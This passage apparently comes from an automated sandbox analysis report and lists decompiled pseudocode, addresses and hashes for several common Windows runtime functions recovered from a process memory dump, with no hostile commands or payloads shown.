				return 0;
			}

0x0524c18d
0x0524c18f
0x0524c191
0x0524c19b
0x0524c1a0
0x0524c1d4
0x0524c1de
0x05292d6e
0x0524c1e4
0x0524c1e4
0x0524c1e4
0x0524c1ec
0x05292d7d
0x05292d7d
0x0524c1f3
0x0524c1ff
0x05292d88
0x05292d8d
0x05292d94
0x05292d94
0x05292d9f
0x05292da4
0x05292dab
0x05292db0
0x05292db2
0x05292db3
0x05292db4
0x05292dbc
0x05292dc3
0x05292dc3
0x0524c205
0x0524c205
0x0524c208
0x0524c20e
0x0524c211
0x0524c216
0x0524c219
0x0524c21f
0x0524c222
0x0524c22c
0x0524c234
0x0524c23a
0x0524c23f
0x0524c245
0x0524c24b
0x0524c251
0x0524c25a
0x0524c276
0x0524c27d
0x0524c27d
0x0524c25c
0x0524c25c
0x00000000
0x0524c25e
0x0524c1a4
0x0524c1aa
0x0524c1b3
0x0524c265
0x0524c26c
0x0524c26c
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 77341b8395a2b752a65b8fc3226300745758c8f58709b9a8ae19efd978d7789e
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: 873126B1B26586BFDB0CEBB8C484BE9F755BF42204F04415AD41C97241DB786E45DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 052A7016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E052A7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x531d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E052A6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E052A6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E05247D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E05269AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0526B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L05244620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x052a7016
0x052a701e
0x052a702b
0x052a7033
0x052a7037
0x052a703c
0x052a703e
0x052a7041
0x052a7045
0x052a704a
0x052a7050
0x052a7055
0x052a705a
0x052a7062
0x052a7062
0x052a705a
0x052a7064
0x052a7064
0x052a7067
0x052a7071
0x052a7096
0x052a709b
0x052a70a2
0x052a70a6
0x052a70a7
0x052a70ad
0x052a70b3
0x052a70b6
0x052a70bb
0x052a70c3
0x052a70c3
0x052a70c6
0x052a70cd
0x052a70dd
0x052a70e0
0x052a70e2
0x052a70e2
0x052a70ee
0x052a7101
0x052a70f0
0x052a70f9
0x052a70f9
0x052a710a
0x052a710e
0x052a7112
0x052a7117
0x052a7118
0x052a7118
0x052a70bb
0x052a711d
0x052a7123
0x052a7131
0x052a7131
0x052a7136
0x052a713d
0x052a713e
0x052a713f
0x052a714a
0x052a714a
0x052a7084
0x052a7088
0x00000000
0x052a708e
0x052a708e
0x052a7092
0x00000000
0x052a7092

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fc76f031a9ddd21c1fe11f2fd948b874a6294e53e7d86c6950235814acbfbb0
Instruction ID: fd4e1df9c5be83fb895fbde50377dd2dcc9f7390c536847302d223daafc0e443
Opcode Fuzzy Hash: 2fc76f031a9ddd21c1fe11f2fd948b874a6294e53e7d86c6950235814acbfbb0
Instruction Fuzzy Hash: 3431A8726187519BC314DF68C954A6AB7E5FF88700F084A2DF89A97690E730E904CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0525A70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0525A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x5317b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x5317b10 = 8;
					 *0x5317b14 = 0x5317b0c;
					 *0x5317b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E0525A990(0x5317b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0525A840(__edx, __ecx, __ecx, _t52, 0x5317b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x5317b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x5317b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x5317b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L05244620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x5317b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E0526F3E0(_t50,  *0x5317b14, _t8 >> 3);
						_t28 =  *0x5317b14; // 0x77f07b0c
						__eflags = _t28 - 0x5317b0c;
						if(_t28 != 0x5317b0c) {
							L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x5317b14 = _t50;
						_t48 = _v12;
						 *0x5317b10 = _t9;
						goto L6;
					}
					 *0x5317b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x0525a713
0x0525a714
0x0525a717
0x0525a71d
0x0525a720
0x0525a722
0x0525a727
0x0525a74a
0x0525a754
0x0525a75e
0x0525a768
0x0525a76a
0x0525a773
0x0525a78b
0x0525a790
0x0525a792
0x0525a741
0x0525a741
0x0525a743
0x0525a749
0x0525a749
0x0525a732
0x0525a73a
0x0525a797
0x0525a79d
0x0525a7a3
0x0525a7a9
0x0525a7b6
0x0525a7bc
0x0525a7ca
0x0525a7e0
0x0525a7e2
0x0525a7e4
0x05299bf2
0x00000000
0x05299bf2
0x0525a7ed
0x0525a7f2
0x0525a800
0x0525a805
0x0525a80d
0x0525a812
0x05299c08
0x05299c08
0x0525a818
0x0525a81b
0x0525a821
0x0525a824
0x00000000
0x0525a824
0x0525a7ae
0x00000000
0x0525a7ae
0x0525a73c
0x0525a73e
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14553b7a85f8e14107b3b43393fb3be050e7d2a283184993c136c43af344a22b
Instruction ID: 1f0177e15b33754a83f52e1e8393bbce0bda6741496960fee17aff46dee0c102
Opcode Fuzzy Hash: 14553b7a85f8e14107b3b43393fb3be050e7d2a283184993c136c43af344a22b
Instruction Fuzzy Hash: 7231A3B17343059FC715CB28EA82F197BFAFB84720F188A59F4068B241DBB49941CB95

Uniqueness

Uniqueness Score: -1.00%

Function 052561A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E052561A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E05255E50(0x52067cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E052F9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0522F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x052561b3
0x052561b5
0x052561bd
0x052561c3
0x052561c7
0x052561d2
0x052561ff
0x052561ff
0x05256201
0x05256207
0x05256207
0x052561d4
0x052561d9
0x00000000
0x00000000
0x052561df
0x052561e2
0x00000000
0x00000000
0x052561e6
0x052561e8
0x052561ee
0x052561ee
0x052561f9
0x0529762f
0x05297632
0x05297635
0x05297639
0x05297640
0x0529766e
0x05297675
0x00000000
0x00000000
0x05297681
0x05297689
0x0529768d
0x05297691
0x05297695
0x05297699
0x052976af
0x052976b5
0x052976b7
0x052976b7
0x052976d7
0x052976dc
0x00000000
0x052976dc
0x052976a2
0x052976a9
0x05297651
0x05297653
0x05297653
0x05297656
0x05297656
0x00000000
0x05297656
0x05297644
0x05297646
0x05297648
0x05297648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ef92ee23dbbc71621d20901e42e2288250fd25cdd279a747618ee3488b91818
Instruction ID: 0cce5861d9e5e8cd0c5168e6de4b66aa83e38a0e6536d0f6d94f801eff9636e7
Opcode Fuzzy Hash: 8ef92ee23dbbc71621d20901e42e2288250fd25cdd279a747618ee3488b91818
Instruction Fuzzy Hash: 8F319C716293428FD724CF09C800B26F7E5FF88B10F48496DE99997351D7B0E804CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0522AA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0522AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x531d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x5317b9c; // 0x0
					_t53 = L05244620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0526B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0526F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L05236C59(_t53, _t51, _t58) != 0) {
							_t28 = E05255E50(0x520c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0525B230(_v32, _v28, 0x520c2d8, 1,  &_v24);
								_t28 = E0522F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x0522aa25
0x0522aa29
0x0522aa2d
0x0522aa30
0x0522aa37
0x0522aa3c
0x05284458
0x05284458
0x05284472
0x05284474
0x05284476
0x0522aa64
0x0522aa74
0x0528447c
0x05284483
0x05284492
0x0522aa52
0x0522aa54
0x0522aa5e
0x052844a8
0x052844ad
0x052844af
0x052844b6
0x052844b6
0x052844b9
0x052844bc
0x052844cd
0x052844d3
0x052844d6
0x052844e1
0x052844e1
0x052844e6
0x052844e8
0x052844fb
0x052844fb
0x052844e8
0x00000000
0x0522aa5e
0x05284476
0x0522aa42
0x0522aa46
0x0522aa48
0x0522aa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa31d1f31aa147f836323b56ad62620fdf3461a07fc686ffa1e9ca832e1170b6
Instruction ID: da3507d4725b9ff1f20f8f46d2a036344c31adc9988000b14ce8b59796e77d38
Opcode Fuzzy Hash: fa31d1f31aa147f836323b56ad62620fdf3461a07fc686ffa1e9ca832e1170b6
Instruction Fuzzy Hash: F531B471A2122AABCF15AFA4CD41A7FB7B9FF04700F014469F905EB290E7749D51DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05264A2C, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E05264A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x531d360 ^ _t62;
				_v8 =  *0x531d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E05242280(_t26, 0x5318608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0523FFB0(_t41, _t51, 0x5318608);
						L2:
						 *0x531b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0526B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E05242280(_t28, 0x5318608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0523FFB0(_t42, _t53, 0x5318608);
							if(_t53 != 0) {
								L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0523FFB0(_t41, _t51, 0x5318608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x05264a2c
0x05264a34
0x05264a3c
0x05264a3e
0x05264a48
0x05264a4b
0x05264a4d
0x05264a51
0x05264a9c
0x00000000
0x00000000
0x05264aa3
0x05264aa8
0x05264aad
0x05264ab1
0x05264ade
0x05264ae3
0x05264a5a
0x05264a62
0x05264a6a
0x05264a6e
0x0529f203
0x05264a84
0x05264a88
0x05264a89
0x05264a8a
0x05264a95
0x05264a95
0x05264a79
0x05264a80
0x05264af2
0x05264af4
0x05264af9
0x05264aff
0x05264b01
0x05264b03
0x05264b08
0x0529f20a
0x0529f212
0x0529f216
0x0529f216
0x05264b08
0x05264b13
0x05264b1a
0x0529f229
0x0529f229
0x05264b1a
0x05264a82
0x00000000
0x05264a82
0x05264ab7
0x05264acd
0x05264acd
0x05264ad5
0x05264ada
0x00000000
0x05264ada
0x05264ac2
0x05264acb
0x00000000
0x00000000
0x00000000
0x05264acb
0x05264a53
0x05264a53
0x05264a58
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00fe754b15d08ba73b3e53873952d00f31efc53593e79af9255ac9166a96376a
Instruction ID: 39a948645566ce6230628994bb17ee0ae06952eb8a529aaf361fdccf57b4f5d0
Opcode Fuzzy Hash: 00fe754b15d08ba73b3e53873952d00f31efc53593e79af9255ac9166a96376a
Instruction Fuzzy Hash: B031F536635351AFCB25EF24C985B2AF7A6FF80710F044519E99A47640CBB0DC80CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 05268EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E05268EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x531d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E05254E70(0x53186e4, 0x5269490, 0, 0);
					if( *0x53153e8 > 5 && E05268F33(0x53153e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x53153e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x53153e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x520bc46;
						_t48 = E052A7B9C(0x53153e8, 0x520bc46, _t67, 0x53153e8, _t70,  &_v140);
					}
				}
				return E0526B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x05268ec7
0x05268ed9
0x05268edc
0x05268ee6
0x05268ee9
0x05268eee
0x05268efc
0x05268f08
0x052a1349
0x052a1353
0x052a135d
0x052a1366
0x052a136f
0x052a1375
0x052a137c
0x052a1385
0x052a1390
0x052a1391
0x052a139c
0x052a139d
0x052a13a6
0x052a13ac
0x052a13b2
0x052a13b5
0x052a13bc
0x052a13bf
0x052a13c2
0x052a13c5
0x052a13c8
0x052a13cb
0x052a13ce
0x052a13d1
0x052a13d4
0x052a13d7
0x052a13da
0x052a13dd
0x052a13e0
0x052a13e3
0x052a13e6
0x052a13e9
0x052a13f6
0x052a1400
0x052a1400
0x05268f08
0x05268f32

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af7386e468e14084d3811d9440814f5346397db7533a384e130976dd765a1a79
Instruction ID: 4dfe997915227edc589d0eea31f19e65e0fbb3edaf7e995540005736d1a65b1d
Opcode Fuzzy Hash: af7386e468e14084d3811d9440814f5346397db7533a384e130976dd765a1a79
Instruction Fuzzy Hash: 20419EB1D102189FDB24CFAAD981AADFBF8FF48310F5041AEE509A7241EB705A84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0525E730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0525E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E05269670() < 0) {
					L0527DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x5317b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L05244620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0525E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x0525e730
0x0525e736
0x0525e738
0x0525e73d
0x0525e73e
0x0525e740
0x0525e749
0x0525e765
0x0525e76a
0x0525e76b
0x0525e76c
0x0525e76d
0x0525e76e
0x0525e76f
0x0525e775
0x0525e777
0x0525e77e
0x0529b675
0x0525e784
0x0525e784
0x0525e789
0x0525e7a8
0x0525e7ac
0x0525e807
0x0525e7ae
0x0525e7ae
0x0525e7b1
0x0525e7b4
0x0525e7b9
0x0525e7c0
0x0525e7c4
0x0525e7ca
0x0525e7cc
0x00000000
0x0525e7d3
0x0525e7d6
0x00000000
0x00000000
0x0525e7ff
0x0525e802
0x00000000
0x00000000
0x0525e7f9
0x0525e7fc
0x00000000
0x00000000
0x0525e7f3
0x0525e7f6
0x00000000
0x00000000
0x0525e7ed
0x0525e7f0
0x00000000
0x00000000
0x0525e7e7
0x0525e7ea
0x00000000
0x00000000
0x0529b685
0x0529b688
0x00000000
0x00000000
0x0529b682
0x00000000
0x00000000
0x0525e7cc
0x0525e7d9
0x0525e7dc
0x0525e7de
0x0525e7de
0x0525e7ac
0x0525e7e4
0x0525e74b
0x0525e751
0x0525e759
0x0525e761
0x0525e761

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
